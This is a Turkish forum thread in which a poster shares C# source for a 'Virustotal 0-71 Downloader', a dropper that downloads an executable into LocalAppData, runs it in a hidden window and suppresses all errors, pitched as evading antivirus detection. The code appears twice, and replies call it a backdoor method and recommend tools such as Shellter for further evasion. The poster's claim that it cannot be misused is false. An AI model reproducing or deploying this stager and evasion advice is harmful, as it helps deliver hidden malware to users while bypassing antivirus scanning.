Virustotal 0-71 Downloader.

Kod:
using System;
using System.IO;
using System.Net;

class Program
{
    static void Main()
    {
        string url = "Dosyanın Linki";  // Dosyanın linkini tırnak içinde koyun
        string fileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "dosyaadi.exe"); // ben local appdata kullanıyorum indirmek için isteğe bağlı farklı konum kullanabilirsiniz burda.

using (WebClient client = new WebClient())
        {
            try
            {
                client.DownloadFile(url, fileName);
                RunExecutableFile(fileName);
            }
            catch (Exception)
            {
                // Ignore silently in case of an error
            }
        }

Console.ReadLine();
    }

static void RunExecutableFile(string fileName)
    {
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = fileName;
            process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            process.Start();
        }
        catch (Exception)
        {
            // Normalde hata koycaktım burda ama vazgeçtim sonradan isteyen yine koyar
        }
    }
}

Kullanım amacı: Öncelikle kötü amaçla kullanılamaz sebebi zaten Download And Execute metodu kullanması. Hile geliştiren arkadaşların en büyük sıkıntılarından biri insanların virustotale atıp virüs bu açmam diyen gibi insanlarla/müşterilerle karşılaşması (hayır beyler tüm hile communitysi burdaki insanlar gibi değil.) CS kullanıp projeyi derleyin doğru yerleri doldurun ve bum:

image.png
WAOW AQ

Kod:
using System;
using System.IO;
using System.Net;

class Program
{
    static void Main()
    {
        string url = "Dosyanın Linki";  // Dosyanın linkini tırnak içinde koyun
        string fileName = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "dosyaadi.exe"); // ben local appdata kullanıyorum indirmek için isteğe bağlı farklı konum kullanabilirsiniz burda.

using (WebClient client = new WebClient())
        {
            try
            {
                client.DownloadFile(url, fileName);
                RunExecutableFile(fileName);
            }
            catch (Exception)
            {
                // Ignore silently in case of an error
            }
        }

Console.ReadLine();
    }

static void RunExecutableFile(string fileName)
    {
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = fileName;
            process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
            process.Start();
        }
        catch (Exception)
        {
            // Normalde hata koycaktım burda ama vazgeçtim sonradan isteyen yine koyar
        }
    }
}

Kullanım amacı: Öncelikle kötü amaçla kullanılamaz sebebi zaten Download And Execute metodu kullanması. Hile geliştiren arkadaşların en büyük sıkıntılarından biri insanların virustotale atıp virüs bu açmam diyen gibi insanlarla/müşterilerle karşılaşması (hayır beyler tüm hile communitysi burdaki insanlar gibi değil.) CS kullanıp projeyi derleyin doğru yerleri doldurun ve bum:

image.png
reis anti viruslere suspend atdırıpda aynı sonucu ala bilirsin :D

reis anti viruslere suspend atdırıpda aynı sonucu ala bilirsin :D
Virustotalde TimeOut yazısını görmek mi undetected yazısını görmek mi :)
GUZEL backdoor yontemı sayılabılır sagolasın lakın bır takım kalı lınux kıtlerı war shellter gibi vırustotal de 50 sonuc veren bır exeyı mınumun duzeye dusurebılıo bu tur kali uygulamalarına bı goz at derım
Kendi sektörümde zaten hem .exe'm hem .bat'ım 0 çekiyor bu yüzden pek dert etmiyorum ama teşekkürler tavsiye için

Şuanda konuyu görüntüleyen kullanıcılar

Üst Alt